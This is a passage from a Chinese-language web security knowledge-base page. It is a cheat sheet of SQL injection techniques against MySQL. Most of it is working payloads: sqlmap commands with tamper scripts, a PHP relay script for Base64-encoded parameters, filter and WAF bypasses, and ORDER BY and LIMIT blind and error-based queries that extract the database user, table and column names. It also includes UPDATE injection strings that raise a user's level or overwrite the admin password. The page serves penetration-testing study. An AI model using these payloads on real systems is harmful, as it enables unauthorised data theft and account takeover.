</span></code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br></div></div><h2 id="base64变形注入">Base64变形注入 <a href="#base64变形注入" class="header-anchor">#</a></h2> <div class="language-http line-numbers-mode"><pre class="language-http"><code><span class="token header-name keyword">http:</span>//xxx.com/?id=MQ==		只加密参数
<span class="token header-name keyword">http:</span>//xxx.com/?aWQ9MQ==	连参数名一起加密了
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>只加密参数，用sqlmap的脚本就行</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -u http://xxx.com/?id<span class="token operator">=</span>MQ<span class="token operator">==</span> --tamper base64encode.py --dbs
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>参数名也加密了，用中转注入</strong></p> <div class="language-php line-numbers-mode"><pre class="language-php"><code>//trans_sqli.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token variable">$id</span><span class="token operator">=</span><span class="token function">base64_encode</span><span class="token punctuation">(</span><span class="token double-quoted-string string">&quot;id=&quot;</span><span class="token punctuation">.</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'id'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">echo</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token double-quoted-string string">&quot;http://xxx.com/sqli.php?<span class="token interpolation"><span class="token punctuation">{</span><span class="token variable">$id</span><span class="token punctuation">}</span></span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	<span class="token comment">//sqli.php是原网页</span>
<span class="token delimiter important">?&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap-u <span class="token string">&quot;http://127.0.0.1/trans_sqli.php?id=12&quot;</span> -v3 --dbs
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="过滤了逗号怎么办">过滤了逗号怎么办 <a href="#过滤了逗号怎么办" class="header-anchor">#</a></h2> <p><strong>盲注的时候</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">LIMIT</span> M <span class="token keyword">OFFSET</span> N	
<span class="token comment">--这里的 M 是最大回显限度，N是偏移量</span>
<span class="token comment">--与limit N,M 有相同效果</span>

<span class="token string">' and ascii(substr((select database()),1,1))=xxx#
--可变为
'</span> <span class="token operator">and</span> ascii<span class="token punctuation">(</span>substr<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token keyword">from</span> <span class="token number">1</span> <span class="token keyword">for</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">=</span>xxx<span class="token comment">#</span>

</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>union联合查询注入时</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span>
<span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">)</span>a <span class="token keyword">JOIN</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">2</span><span class="token punctuation">)</span>b <span class="token keyword">JOIN</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">3</span><span class="token punctuation">)</span>c<span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">23</span>

<span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">)</span>a <span class="token keyword">JOIN</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">2</span><span class="token punctuation">)</span>b <span class="token keyword">JOIN</span> <span class="token punctuation">(</span><span class="token keyword">select</span> CONCAT_WS<span class="token punctuation">(</span><span class="token keyword">CHAR</span><span class="token punctuation">(</span><span class="token number">32</span><span class="token punctuation">,</span><span class="token number">58</span><span class="token punctuation">,</span><span class="token number">32</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token keyword">user</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>version<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>c<span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">23</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><h2 id="between-and代替-尖括号">Between And代替 &quot;&gt;&quot; 尖括号 <a href="#between-and代替-尖括号" class="header-anchor">#</a></h2> <p>在<code>sqlmap</code>中使用between and 代替其它字符加上 <code>--tamper=between</code> 即可</p> <p><strong>判断条件真假</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token number">2</span> <span class="token operator">&gt;</span> <span class="token number">1</span>   <span class="token comment">#真</span>
<span class="token number">0</span> <span class="token operator">&gt;</span> <span class="token number">1</span>   <span class="token comment">#假</span>
<span class="token comment">#以下用between and 实现判断真假</span>
<span class="token number">2</span> <span class="token operator">between</span> <span class="token number">1</span> <span class="token operator">and</span> <span class="token number">3</span>   <span class="token comment">#真</span>
<span class="token number">3</span> betwwen <span class="token number">1</span> <span class="token operator">and</span> <span class="token number">2</span>   <span class="token comment">#假</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><code>between and</code>还支持16进制,所以可以用16进制,来绕过单引号的过滤</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">select</span> <span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">between</span> <span class="token number">0x61</span> <span class="token operator">and</span> <span class="token number">0x7a</span><span class="token punctuation">;</span>    <span class="token comment">//select database() between 'a' and 'z';</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="未知列名情况下的注入利用">未知列名情况下的注入利用 <a href="#未知列名情况下的注入利用" class="header-anchor">#</a></h2> <p><code>mysql</code>版本&lt;5.0或在利用<code>SQL</code>注入的时候遇到了WAF；</p> <p>安全狗3.5版本会直接拦截关键字<code>information_shema</code>；</p> <p>从而无法获取数据表的列名，这时可以<strong>利用虚表获取数据</strong>。</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token operator">-</span><span class="token number">1</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token punctuation">`</span><span class="token number">4</span><span class="token punctuation">`</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span><span class="token punctuation">,</span><span class="token number">6</span> <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> users<span class="token punctuation">)</span>a <span class="token keyword">limit</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">--可以通过不停的修改列名1，2，3，4来提取数据( 改这个用反引号包裹的`4`)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><a href="https://nosec.org/home/detail/2245.html" target="_blank" rel="noopener noreferrer">参考<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h1 id="order-by注入">Order-By注入 <a href="#order-by注入" class="header-anchor">#</a></h1> <blockquote><p>order by 注入是<code>SQL</code>注入中很常见的，被过滤的概率小；</p> <p>可被用户控制的数据在order by 子句后边，即order参数可控。</p></blockquote> <h3 id="利用报错">利用报错 <a href="#利用报错" class="header-anchor">#</a></h3> <h4 id="利用regexp">利用regexp <a href="#利用regexp" class="header-anchor">#</a></h4> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>http:<span class="token comment">//192.168.239.2:81/?order=(select+1+regexp+if(1=1,1,0x00)) 正常</span>
http:<span class="token comment">//192.168.239.2:81/?order=(select+1+regexp+if(1=2,1,0x00)) 错误</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h4 id="利用updatexml">利用updatexml <a href="#利用updatexml" class="header-anchor">#</a></h4> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>http:<span class="token comment">//192.168.239.2:81/?order=updatexml(1,if(1=1,1,user()),1)  正确</span>
http:<span class="token comment">//192.168.239.2:81/?order=updatexml(1,if(1=2,1,user()),1)  错误</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h4 id="利用extractvalue">利用extractvalue <a href="#利用extractvalue" class="header-anchor">#</a></h4> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>http:<span class="token comment">//192.168.239.2:81/?order=extractvalue(1,if(1=1,1,user())) 正确</span>
http:<span class="token comment">//192.168.239.2:81/?order=extractvalue(1,if(1=2,1,user())) 错误</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h3 id="利用时间盲注">利用时间盲注 <a href="#利用时间盲注" class="header-anchor">#</a></h3> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token operator">/</span>?<span class="token keyword">order</span><span class="token operator">=</span><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token keyword">SELECT</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token keyword">FROM</span><span class="token punctuation">(</span><span class="token keyword">SELECT</span><span class="token punctuation">(</span>SLEEP<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>test<span class="token punctuation">)</span><span class="token punctuation">)</span> 正常响应时间
<span class="token operator">/</span>?<span class="token keyword">order</span><span class="token operator">=</span><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token operator">=</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token keyword">SELECT</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token keyword">FROM</span><span class="token punctuation">(</span><span class="token keyword">SELECT</span><span class="token punctuation">(</span>SLEEP<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>test<span class="token punctuation">)</span><span class="token punctuation">)</span> sleep <span class="token number">2</span>秒
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h3 id="数据猜解">数据猜解 <a href="#数据猜解" class="header-anchor">#</a></h3> <p>以猜解user()即<code>root@localhost</code>为例子，由于只能一位一位猜解；</p> <p>可以利用<code>SUBSTR</code>,<code>SUBSTRING</code>,<code>MID</code>,以及<code>left</code>和<code>right</code>可以精准分割出每一位子串；</p> <p>然后就是比较操作了可以利用<code>=</code>,<code>like</code>,<code>regexp</code>等；</p> <p>这里要注意<code>like</code>是不区分大小写；</p> <p>通过以下可以得知user()第一位为<code>r</code>,ascii码的16进制为0x72</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>http:<span class="token comment">//192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x72,1,0x00)) 正确</span>
http:<span class="token comment">//192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x71,1,0x00)) 错误</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>猜解当前数据的表名</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token operator">/</span>?<span class="token keyword">order</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token keyword">select</span><span class="token operator">+</span><span class="token number">1</span><span class="token operator">+</span><span class="token operator">regexp</span><span class="token operator">+</span><span class="token keyword">if</span><span class="token punctuation">(</span>substring<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span><span class="token operator">+</span>concat<span class="token punctuation">(</span>table_name<span class="token punctuation">)</span><span class="token keyword">from</span><span class="token operator">+</span>information_schema<span class="token punctuation">.</span><span class="token keyword">tables</span><span class="token operator">+</span><span class="token keyword">where</span><span class="token operator">+</span>table_schema<span class="token operator">%</span><span class="token number">3</span>ddatabase<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">+</span><span class="token keyword">limit</span><span class="token operator">+</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token number">0x67</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">0x00</span><span class="token punctuation">)</span><span class="token punctuation">)</span>  正确
<span class="token operator">/</span>?<span class="token keyword">order</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token keyword">select</span><span class="token operator">+</span><span class="token number">1</span><span class="token operator">+</span><span class="token operator">regexp</span><span class="token operator">+</span><span class="token keyword">if</span><span class="token punctuation">(</span>substring<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span><span class="token operator">+</span>concat<span class="token punctuation">(</span>table_name<span class="token punctuation">)</span><span class="token keyword">from</span><span class="token operator">+</span>information_schema<span class="token punctuation">.</span><span class="token keyword">tables</span><span class="token operator">+</span><span class="token keyword">where</span><span class="token operator">+</span>table_schema<span class="token operator">%</span><span class="token number">3</span>ddatabase<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">+</span><span class="token keyword">limit</span><span class="token operator">+</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token number">0x66</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">0x00</span><span class="token punctuation">)</span><span class="token punctuation">)</span> 错误
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>猜解指定表名中的列名</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token operator">/</span>?<span class="token keyword">order</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token keyword">select</span><span class="token operator">+</span><span class="token number">1</span><span class="token operator">+</span><span class="token operator">regexp</span><span class="token operator">+</span><span class="token keyword">if</span><span class="token punctuation">(</span>substring<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span><span class="token operator">+</span>concat<span class="token punctuation">(</span>column_name<span class="token punctuation">)</span><span class="token keyword">from</span><span class="token operator">+</span>information_schema<span class="token punctuation">.</span><span class="token keyword">columns</span><span class="token operator">+</span><span class="token keyword">where</span><span class="token operator">+</span>table_schema<span class="token operator">%</span><span class="token number">3</span>ddatabase<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">+</span><span class="token operator">and</span><span class="token operator">+</span>table_name<span class="token operator">%</span><span class="token number">3</span>d0x676f6f6473<span class="token operator">+</span><span class="token keyword">limit</span><span class="token operator">+</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token number">0x69</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">0x00</span><span class="token punctuation">)</span><span class="token punctuation">)</span> 正常
<span class="token operator">/</span>?<span class="token keyword">order</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token keyword">select</span><span class="token operator">+</span><span class="token number">1</span><span class="token operator">+</span><span class="token operator">regexp</span><span class="token operator">+</span><span class="token keyword">if</span><span class="token punctuation">(</span>substring<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span><span class="token operator">+</span>concat<span class="token punctuation">(</span>column_name<span class="token punctuation">)</span><span class="token keyword">from</span><span class="token operator">+</span>information_schema<span class="token punctuation">.</span><span class="token keyword">columns</span><span class="token operator">+</span><span class="token keyword">where</span><span class="token operator">+</span>table_schema<span class="token operator">%</span><span class="token number">3</span>ddatabase<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">+</span><span class="token operator">and</span><span class="token operator">+</span>table_name<span class="token operator">%</span><span class="token number">3</span>d0x676f6f6473<span class="token operator">+</span><span class="token keyword">limit</span><span class="token operator">+</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token number">0x68</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">0x00</span><span class="token punctuation">)</span><span class="token punctuation">)</span> 错误
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>然后结合Burp去猜解即可~（<a href="https://www.cnblogs.com/icez/p/Mysql-Order-By-Injection-Summary.html" target="_blank" rel="noopener noreferrer">参考<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>）</p> <p>知道了原理，用Burp去猜解即可</p> <h1 id="limit-注入">limit 注入 <a href="#limit-注入" class="header-anchor">#</a></h1> <p><strong>先科普下limit的用法</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>格式：
<span class="token keyword">limit</span> m<span class="token punctuation">,</span>n
<span class="token comment">--m是记录开始的位置，n是取n条数据</span>
<span class="token keyword">limit</span> <span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span>
<span class="token comment">--从第一条开始，取一条数据</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>(适用于5.0.0&lt;mysql&lt;5.6.6的版本)</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">SELECT</span> field <span class="token keyword">FROM</span> <span class="token keyword">table</span> <span class="token keyword">WHERE</span> id <span class="token operator">&gt;</span> <span class="token number">0</span> <span class="token keyword">ORDER</span> <span class="token keyword">BY</span> id <span class="token keyword">LIMIT</span> （注入点）
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>确认有注入点前面有 order by 关键字,没法用union</p> <p>在LIMIT后面可以跟两个函数，PROCEDURE 和 INTO，INTO除非有写入shell的权限，否则是无法利用的;</p> <p><strong>报错注入：</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>?id<span class="token operator">=</span><span class="token number">1</span> <span class="token keyword">procedure</span> analyse<span class="token punctuation">(</span>extractvalue<span class="token punctuation">(</span>rand<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>concat<span class="token punctuation">(</span><span class="token number">0x7e</span><span class="token punctuation">,</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>时间型盲注：</strong></p> <p>直接使用sleep不行，需要用BENCHMARK代替</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>?id<span class="token operator">=</span><span class="token number">1</span> <span class="token keyword">PROCEDURE</span> analyse<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span> extractvalue<span class="token punctuation">(</span>rand<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>concat<span class="token punctuation">(</span><span class="token number">0x7e</span><span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token keyword">IF</span><span class="token punctuation">(</span><span class="token function">MID</span><span class="token punctuation">(</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">LIKE</span> <span class="token number">5</span><span class="token punctuation">,</span> BENCHMARK<span class="token punctuation">(</span><span class="token number">5000000</span><span class="token punctuation">,</span>SHA1<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h1 id="sql里面只有update怎么利用">SQL里面只有update怎么利用？ <a href="#sql里面只有update怎么利用" class="header-anchor">#</a></h1> <p>这种方式会修改数据，很危险，在授权测试允许的情况下才考虑</p> <p>一般在用户修改密码的地方</p> <p>先理解这句 <code>SQL</code></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">UPDATE</span> <span class="token keyword">user</span> <span class="token keyword">SET</span> password<span class="token operator">=</span><span class="token string">'MD5($password)'</span><span class="token punctuation">,</span> homepage<span class="token operator">=</span><span class="token string">'$homepage'</span> <span class="token keyword">WHERE</span> id<span class="token operator">=</span><span class="token string">'$id'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如果此 <code>SQL</code> 被修改成以下形式，就实现了注入</p> <p><strong>1、修改 homepage 值为<code>http://baidu.com', userlevel='3</code></strong></p> <p>之后 SQL 语句变为</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">UPDATE</span> <span class="token keyword">user</span> <span class="token keyword">SET</span> password<span class="token operator">=</span><span class="token string">'mypass'</span><span class="token punctuation">,</span> homepage<span class="token operator">=</span><span class="token string">'http://baidu.com'</span><span class="token punctuation">,</span> userlevel<span class="token operator">=</span><span class="token string">'3'</span> <span class="token keyword">WHERE</span> id<span class="token operator">=</span><span class="token string">'$id'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><code>userlevel</code> 为用户级别</p> <p><strong>2、修改 password 值为<code>mypass)' WHERE username='admin'#</code></strong></p> <p>之后 <code>SQL</code> 语句变为</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">UPDATE</span> <span class="token keyword">user</span> <span class="token keyword">SET</span> password<span class="token operator">=</span><span class="token string">'MD5(mypass)'</span> <span class="token keyword">WHERE</span> username<span class="token operator">=</span><span class="token string">'admin'</span><span class="token comment">#)', homepage='$homepage' WHERE id='$id'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>3、修改 id 值为<code>' OR username='admin'</code></strong>
之后 <code>SQL</code> 语句变为</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">UPDATE</span> <span class="token keyword">user</span> <span class="token keyword">SET</span> password<span class="token operator">=</span><span class="token string">'MD5($password)'</span><span class="token punctuation">,</span> homepage<span class="token operator">=</span><span class="token string">'$homepage'</span> <span class="token keyword">WHERE</span> id<span class="token operator">=</span><span class="token string">''</span> <span class="token operator">OR</span> username<span class="token operator">=</span><span class="token string">'admin'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h1 id="其它数据库参考">其它数据库参考 <a href="#其它数据库参考" class="header-anchor">#</a></h1> <p><a href="https://www.anquanke.com/post/id/86011" target="_blank" rel="noopener noreferrer">MSSQL 注入攻击与防御<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.tr0y.wang/2019/04/16/Oracle%E6%B3%A8%E5%85%A5%E6%8C%87%E5%8C%97/index.html" target="_blank" rel="noopener noreferrer">Orcle注入<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/web/xxe.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        XML实体注入漏洞
      </a></span> <span class="next"><a href="/knowledge/web/mysql-write-shell.html">
        MySQL写shell
